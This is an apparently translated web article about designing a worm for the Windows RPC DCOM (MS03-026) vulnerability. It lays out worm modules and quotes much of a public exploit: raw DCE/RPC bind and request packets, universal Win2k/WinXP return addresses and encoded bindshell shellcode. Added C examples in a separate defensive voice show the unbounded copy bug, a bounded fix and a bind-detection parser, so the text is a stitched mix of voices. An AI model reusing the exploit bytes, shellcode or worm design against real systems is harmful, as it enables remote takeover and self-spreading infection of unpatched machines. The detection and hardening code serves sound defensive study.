A study of a hypothetical RPC DCOM worm

Source: Internet
Author: User
Tags: 0xc0
Lately, almost every time a major vulnerability is announced, a worm exploiting it follows, and the recent and very nasty RPC DCOM vulnerability looks set to become the next worm vector. Writing worms seems to have become fashionable; many people are curious about it and imagine it to be deep technology, when in fact it is a fairly simple programming exercise. I had long intended to write a technical analysis of worms (and, so as not to teach the kids bad habits, had lost interest in actually writing one), but laziness got in the way. Now that a new worm storm is on the horizon, I offer here a brief analysis of worm-related technology together with some thoughts on what an RPC DCOM worm might look like. Whether you see this as aiding and abetting or as deliberate showing off, I still think the article is worth writing: I have not written anything in over a year, and this fulfils a wish of my own. You can stop reading here, but please don't spit at me once you have finished. :)


1. What is a worm

First, an excerpt from Spark's article "Definition and history of Internet worms" explaining the term: the biological term "worm" was brought into computing in 1982 by John F. Shoch and others at Xerox PARC [30], who gave the two most basic characteristics of a computer worm: it "can move from one computer to another" and it "can copy itself". Their purpose in writing worms was to experiment with a model of distributed computing, and already then the destructiveness of worms and the difficulty of controlling them began to show. After the Morris worm outbreak of 1988, Eugene H. Spafford gave a technical definition of the worm in order to distinguish it from a virus: "A worm is a program that can run by itself and can propagate a fully working version of itself to other machines."

Since this article is not about the definition and history of worms, I will not say more; if you are interested, you can read Spark's article here: http://www.nsfocus.net/index.php?act=magazine&do=view&mid=1851

2. The composition of a worm

The composition of a worm is actually very simple. Since I am not here to teach you to write worms, and time is limited, I will only sketch it.
We can think of a worm as a project and divide that project into four modules:

1. Attack module
First you need a serious vulnerability that affects a large number of systems and can be exploited easily enough to take remote control of the machine: guessing weak passwords, a remote overflow, and so on.

2. Infection module
This handles what happens once the target has been attacked: it makes the target carry out the function you want and completes the infection of that host. For a remote overflow this means a well-crafted shellcode. The propagation path (how the infection spreads onward) has to be considered here as well.

3. Communication module
For example, scan a network segment for machines with the relevant weakness, save them to a file and then attack those IPs; or generate random IPs and attack them directly.
Put simply, it finds weak machines to attack.

4. Function module
The function module is optional, but if you want the worm to add a back door, DDoS capability or other functions to the infected host, you need it.

In fact, the key to a worm's success lies in the attack module and the infection module. :)


3. Propagation paths of common worms


I will not go into detail here, just a simple list:

1. Email

2. FTP

3. HTTP

4. NetBIOS

5. TFTP

6. rcp

7. Other


4. Introduction to the RPC DCOM vulnerability

The RPC DCOM vulnerability is a serious flaw recently disclosed in Windows (Microsoft Security Bulletin MS03-026), and it affects more Windows versions than any previous Windows vulnerability.

Remote Procedure Call (RPC) is a protocol used by the Windows operating system. RPC provides an inter-process communication mechanism that lets a program running on one computer execute code on a remote system. The protocol is derived from the OSF (Open Software Foundation) RPC protocol, with some Microsoft-specific extensions added later. The part of RPC that handles message exchange over TCP/IP does not correctly handle malformed messages, and a remote attacker can use this flaw to execute arbitrary code with Local System privileges. The flaw lies in the DCOM interface exposed through RPC, which processes the DCOM object activation requests (for example, a UNC path to the object) that a client sends to the server. An attacker who successfully exploits it runs arbitrary code with Local System privileges and can then do anything on the system: install programs; view, change or delete data; or create accounts with administrator privileges. The vulnerable code is reached through any transport that delivers DCE/RPC to the RPCSS service, in practice TCP port 135 or the SMB named-pipe transport on ports 139 and 445, which is why the exploit quoted below has a port option.
This vulnerability affects the following versions of Windows:
Microsoft Windows XP SP1a
Microsoft Windows XP SP1
Microsoft Windows XP
Microsoft Windows NT 4.0 SP6a
Microsoft Windows NT 4.0 SP6
Microsoft Windows NT 4.0 SP5
Microsoft Windows NT 4.0 SP4
Microsoft Windows NT 4.0 SP3
Microsoft Windows NT 4.0 SP2
Microsoft Windows NT 4.0 SP1
Microsoft Windows NT 4.0
Microsoft Windows Server 2003
Microsoft Windows 2000 SP4
Microsoft Windows 2000 SP3
Microsoft Windows 2000 SP2
Microsoft Windows 2000 SP1
Microsoft Windows 2000

As the list shows, this vulnerability affects every Windows version except Windows ME and the earlier 9x line. It can be exploited remotely:
an attacker can run arbitrary code on any machine that has not been patched and thereby take complete control of it.
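To make the bug class concrete, here is an added illustration that is not from the original article and is not Microsoft's RPCSS code: it is modelled on the public descriptions of the flaw, in which the server-name component of a UNC path inside a DCOM activation request is copied into a fixed-size stack buffer without a length check. The 32-character buffer size, the function names and the sample paths are assumptions for illustration; the over-long server name mirrors the padded name that the exploit quoted in section 5 builds from request2, the shellcode and request3.

```c
/* Added illustration of the RPC DCOM bug class (not the article's or
 * Microsoft's code). Modelled on public descriptions of the flaw: the
 * server-name part of a UNC path is copied into a fixed-size stack buffer
 * with no length check. Buffer size, names and paths are assumptions. */
#include <stdio.h>
#include <wchar.h>

#define MACHINE_NAME_CHARS 32   /* assumed destination size, in wide chars */

/* Wide chars between the leading "\\" and the next backslash, i.e. what the
 * copy below would write. Returns 0 for a path that is not UNC. */
size_t unc_server_name_len(const wchar_t *unc) {
    if (unc[0] != L'\\' || unc[1] != L'\\') return 0;
    const wchar_t *p = unc + 2;
    while (*p && *p != L'\\') p++;
    return (size_t)(p - (unc + 2));
}

/* Vulnerable pattern: copies up to the next backslash with no bound on
 * dest. Any server name of MACHINE_NAME_CHARS or more wide chars runs past
 * a buffer of that size. Shown to be read, never to be run on untrusted
 * input. */
void get_machine_name_unsafe(const wchar_t *unc, wchar_t *dest) {
    const wchar_t *p = unc + 2;            /* skip "\\" */
    while (*p && *p != L'\\')
        *dest++ = *p++;                    /* no check against dest size */
    *dest = L'\0';
}

/* Hardened pattern: same parsing, but the copy is bounded and an over-long
 * name is rejected rather than silently truncated. Returns the name length,
 * or -1 if the path is malformed or would not fit. */
int get_machine_name_safe(const wchar_t *unc, wchar_t *dest, size_t dest_chars) {
    if (dest_chars == 0 || unc[0] != L'\\' || unc[1] != L'\\') return -1;
    const wchar_t *p = unc + 2;
    size_t n = 0;
    while (*p && *p != L'\\') {
        if (n + 1 >= dest_chars) return -1;   /* keep room for the terminator */
        dest[n++] = *p++;
    }
    dest[n] = L'\0';
    return (int)n;
}

/* 1 if the unsafe copy would overflow a MACHINE_NAME_CHARS buffer. */
int unsafe_copy_would_overflow(const wchar_t *unc) {
    return unc_server_name_len(unc) + 1 > (size_t)MACHINE_NAME_CHARS;
}

/* Result of the safe copy into a buffer of the assumed size (-1 = rejected). */
int safe_copy_result(const wchar_t *unc) {
    wchar_t name[MACHINE_NAME_CHARS];
    return get_machine_name_safe(unc, name, MACHINE_NAME_CHARS);
}

/* Constructed inputs: a normal activation path and one whose server-name
 * component is 40 chars, like the padded name in the exploit's request3. */
#define NORMAL_PATH L"\\\\fileserver\\C$\\report.doc"
#define LONG_PATH   L"\\\\" L"1111111111" L"1111111111" L"1111111111" L"1111111111" L"\\C$\\123456.doc"

int main(void) {
    const wchar_t *paths[] = { NORMAL_PATH, LONG_PATH };
    for (int i = 0; i < 2; i++) {
        printf("server name %zu chars: unsafe copy %s, safe copy -> %d\n",
               unc_server_name_len(paths[i]),
               unsafe_copy_would_overflow(paths[i]) ? "OVERFLOWS" : "fits",
               safe_copy_result(paths[i]));
    }
    return 0;
}
```

The point of the safe variant is that it refuses rather than truncates: a truncated server name would silently redirect the activation to a different host, which is its own problem, whereas a refusal turns the over-long request into an error the caller can log.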


5. Conception of an RPC DCOM worm

1. The vulnerability is likely to be turned into a worm that infects Win2000/WinXP machines carrying the RPC DCOM flaw, because public exploit code that works against both Win2000 and WinXP already exists.

For example, the Win2000/WinXP universal exploit posted on Packetstorm:


/* Windows 2003 <= remote RPC DCOM exploit
 * Coded by .:[oc192.us]:. Security
 *
 * Features:
 *
 * -d destination host to attack.
 *
 * -p for port selection as exploit works on ports other than 135 (139,445,539 etc)
 *
 * -r for using a custom return address.
 *
 * -t to select target type (Offset), this includes universal offsets for
 *    Win2K and WinXP (Regardless of Service pack)
 *
 * -l to select bindshell port on remote machine (default: 666)
 *
 * - Shellcode has been modified to call ExitThread, rather than ExitProcess,
 *   preventing crash of RPC service on remote machine.
 *
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission to
 * do so.
 */

#include <stdio.h>
#include <stdlib.h>
#include <error.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>

/* Xfocus Start */
unsigned char bindstr[]={
0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7f,0x00,0x00,0x00,
0xd0,0x16,0xd0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,
0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xe8,0x03
, 0x00,0x00,0xe5,0x00,0x00,0x00,0xd0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
, 0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xfd,0xcc,0x45
, 0x64,0x49,0xb0,0x70,0xdd,0xae,0x74,0x2c,0x96,0xd2,0x60,0x5e,0x0d,0x00,0x01,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5e,0x0d,0x00,0x02,0x00,0x00,0x00,0x7c,0x5e
, 0x0d,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xf1,0xf1,0x2a,0x4d
, 0xce,0x11,0xa6,0x6a,0x00,0x20,0xaf,0x6e,0x72,0xf4,0x0c,0x00,0x00,0x00,0x4d,0x41
, 0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0d,0xf0,0xad,0xba,0x00,0x00
, 0x00,0x00,0xa8,0xf4,0x0b,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4d,0x45
, 0x4f,0x57,0x04,0x00,0x00,0x00,0xa2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00
, 0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00
, 0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
, 0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xc8,0x00
, 0x00,0x00,0x4d,0x45,0x4f,0x57,0x28,0x03,0x00,0x00,0xd8,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc4,0x28,0xcd,0x00,0x64,0x29
, 0xcd,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xb9,0x01,0x00,0x00,0x00,0x00
, 0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xab,0x01,0x00,0x00,0x00,0x00
, 0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xa5,0x01,0x00,0x00,0x00,0x00
, 0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xa6,0x01,0x00,0x00,0x00,0x00
, 0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xa4,0x01,0x00,0x00,0x00,0x00
, 0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xad,0x01,0x00,0x00,0x00,0x00
, 0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xaa,0x01,0x00,0x00,0x00,0x00
, 0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
, 0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
, 0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
, 0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x50,0x00,0x00,0x00,0x4f,0xb6,0x88,0x20,0xff,0xff
, 0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
, 0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
, 0x02,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x78,0x19,0x0c,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
, 0x00,0x00,0x70,0xd8,0x98,0x93,0x98,0x4f,0xd2,0x11,0xa9,0x3d,0xbe,0x57,0xb2,0x00
, 0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x80,0x00
, 0x00,0x00,0x0d,0xf0,0xad,0xba,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
, 0x00,0x00,0x60,0x00,0x00,0x00,0x4d,0x45,0x4f,0x57,0x04,0x00,0x00,0x00,0xc0,0x01
, 0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3b,0x03
, 0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
, 0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xc5,0x17,0x03,0x80,0x0e
, 0xe9,0x4a,0x99,0x99,0xf1,0x8a,0x50,0x6f,0x7a,0x85,0x02,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x30,0x00
, 0x00,0x00,0x78,0x00,0x6e,0x00,0x00,0x00,0x00,0x00,0xd8,0xda,0x0d,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2f,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
, 0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x10,0x00
, 0x00,0x00,0x30,0x00,0x2e,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x68,0x00
, 0x00,0x00,0x0e,0x00,0xff,0xff,0x68,0x8b,0x0b,0x00,0x02,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
, 0x00,0x00,0x5c,0x00,0x5c,0x00};

unsigned char request3[]={
0x5c,0x00
, 0x43,0x00,0x24,0x00,0x5c,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
, 0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
, 0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
, 0x2e,0x00,0x64,0x00,0x6f,0x00,0x63,0x00,0x00,0x00};
/* End Xfocus */

int type=0;
struct
{
    char *os;
    u_long ret;
}
targets[] =
{
    { "[Win2k-Universal]", 0x0018759f },
    { "[WinXP-Universal]", 0x0100139d },
}, v;


void usage(char *prog)
{
    int i;
    printf("RPC DCOM exploit coded by .:[oc192.us]:. Security\n");
    printf("Usage:\n\n");
    printf("%s -d <host> [options]\n", prog);
    printf("Options:\n");
    printf("        -d: Hostname to attack [Required]\n");
    printf("        -t: Type [Default: 0]\n");
    printf("        -r: Return address [Default: Selected from target]\n");
    printf("        -p: Attack port [Default: 135]\n");
    printf("        -l: Bindshell port [Default: 666]\n\n");
    printf("Types:\n");
    for (i = 0; i < sizeof(targets)/sizeof(v); i++)
        printf("        %d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
    exit(0);
}

unsigned char sc[]=
"\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"

"\xff\xff\xff\xff" /* Return address */

"\xcc\xe0\xfd\x7f" /* Primary thread data block */
"\xcc\xe0\xfd\x7f" /* Primary thread data block */

/* Bindshell no RPC crash, definable spawn port */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
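From the defender's side, the most useful part of the bytes above is the bind request: before any activation request can reach the vulnerable code, the client has to bind the DCOM activation interface (ISystemActivator, IID 000001a0-0000-0000-c000-000000000046) over DCE/RPC. The following added example, which is not part of this article or of the oc192 exploit, parses a DCE/RPC version 5 bind PDU and reports the interface UUID being bound; the sample input is a copy of the 72-byte bindstr above, and the field offsets follow the DCE/RPC connection-oriented PDU layout. A bind to this interface is normal on a Windows network, so on its own it is a context signal for an IDS rule or a capture triage script, not proof of attack; what follows the bind (an over-long server name in the activation request) is the actual indicator.

```c
/* Added example (not the article's or the oc192 exploit's code): decode a
 * DCE/RPC v5 connection-oriented "bind" PDU and extract the abstract
 * syntax (interface) UUID of its first presentation context. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed copy of the exploit's bindstr[]: a bind to ISystemActivator. */
static const uint8_t bindstr_sample[] = {
    0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7f,0x00,0x00,0x00,
    0xd0,0x16,0xd0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
    0x00,0x00,0x00,0x00,
    0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,
    0x02,0x00,0x00,0x00
};

/* IID of ISystemActivator, the DCOM remote activation interface. */
#define ISYSTEMACTIVATOR_UUID "000001a0-0000-0000-c000-000000000046"
#define PTYPE_BIND            0x0b
#define DREP_LITTLE_ENDIAN    0x10   /* high nibble of packed_drep byte 0 */

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Layout (offsets in bytes): 0 rpc_vers, 2 ptype, 4 packed_drep, 8 frag_length,
 * 16 max_xmit_frag, 18 max_recv_frag, 20 assoc_group_id, 24 n_context_elem,
 * 28 p_cont_id, 30 n_transfer_syn, 32 abstract syntax UUID, 48 its version.
 * Writes the UUID as text into uuid_out (37 bytes). 0 on success, -1 if the
 * buffer is not a well-formed little-endian bind. */
int dcerpc_bind_interface(const uint8_t *buf, size_t len, char uuid_out[37]) {
    if (len < 16) return -1;                              /* common header */
    if (buf[0] != 5 || buf[2] != PTYPE_BIND) return -1;
    if ((buf[4] & 0xf0) != DREP_LITTLE_ENDIAN) return -1; /* big-endian DREP not handled */
    uint16_t frag_len = le16(buf + 8);
    if (frag_len < 52 || frag_len > len) return -1;       /* need one full context element */
    if (buf[24] == 0) return -1;                          /* no presentation contexts */
    const uint8_t *u = buf + 32;
    snprintf(uuid_out, 37, "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x",
             (unsigned)le32(u), (unsigned)le16(u + 4), (unsigned)le16(u + 6),
             u[8], u[9], u[10], u[11], u[12], u[13], u[14], u[15]);
    return 0;
}

/* Convenience wrapper: UUID string in static storage, or NULL on failure. */
const char *bind_uuid_string(const uint8_t *buf, size_t len) {
    static char uuid[37];
    return dcerpc_bind_interface(buf, len, uuid) == 0 ? uuid : NULL;
}

/* 1 if the PDU binds ISystemActivator, 0 otherwise (including parse errors). */
int binds_isystemactivator(const uint8_t *buf, size_t len) {
    char uuid[37];
    if (dcerpc_bind_interface(buf, len, uuid) != 0) return 0;
    return strcmp(uuid, ISYSTEMACTIVATOR_UUID) == 0;
}

int main(void) {
    const char *uuid = bind_uuid_string(bindstr_sample, sizeof bindstr_sample);
    printf("bind to %s -> %s\n", uuid ? uuid : "(unparseable)",
           binds_isystemactivator(bindstr_sample, sizeof bindstr_sample)
               ? "ISystemActivator (DCOM activation)" : "other interface");
    return 0;
}
```

Only the first presentation context is decoded; a client may offer several, so a production rule should walk all n_context_elem entries. The UUID is stored little-endian in the first three fields (which is why time_low reads as 000001a0) and byte-ordered in the last two.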
